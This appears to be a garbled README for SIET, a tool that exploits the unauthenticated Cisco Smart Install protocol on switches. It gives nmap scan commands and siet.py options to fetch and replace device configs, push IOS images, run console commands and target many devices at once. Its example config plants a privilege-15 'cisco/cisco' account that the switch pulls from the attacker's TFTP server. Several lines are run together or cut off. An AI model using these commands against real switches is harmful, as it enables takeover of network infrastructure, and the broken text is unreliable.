Smart Install Exploitation Tool
Cisco Smart Install is a plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches. You can ship a switch to a location, place it in the network and power it on with no configuration required on the device.
You can easy identify it using nmap cisco-siet.nse script. Just download it and run it: ``` nmap -p 4786 -v 192.168.0.1 # By default, it will just test whether host is vulnerable or not $ nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse
$ sudo nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse \
--script-args "cisco-siet.get" ```
This protocol has a few security issues and this simple tool helps you to use all of them.:
startup-configon tftp-server exchanged previously.
startup-configfor the file which has been copied and edited. Device will reboot in defined time.
All of them are caused by the lack of any authentication in smart install protocol. Any device can act as a director and send malformed tcp packet. It works on any "client" device where smart install is enabled. It does not matter if it used smart install in the network or not.
Confim from vendor:
You can use it for password recovery of for unlock cisco switch when no password provided.
Example to get config:
sudo python siet.py -g -i 192.168.0.1
-ttest device for smart install
-gget device config
-cchange device config
-Cchange multiple device configs
-uupdate device IOS
-eexecute commands in device's console
-iip address of target device
-lip list of targets (file path)
--thread-countnumber of threads to be spawned
tftp(near siet.py) and file inside it
"username cisco privilege 15 secret 0 cisco" "exit"
siet.pywith IP address of device.
siet.pystarts tftp server (69 port UDP) on your IP.
siet.pysend command to switch to force download that file and execute it.
-C. You can place configs into the
tftp/confdirectory following the naming convention of
192.168.10.1.conf. A target ip list
-lmust be used in conjunction with this option, the name of the conf corresponds to it's target destination.
-l. You can use list of ip addresses for getting configuration file.
Fix bug with incorrect test of device.
If you are thinking about what to do with the copied configuration files, you can try our new tool: Cisco Config Analysis Tool
If you have any questions, please write me at telegram: @sab0tag3d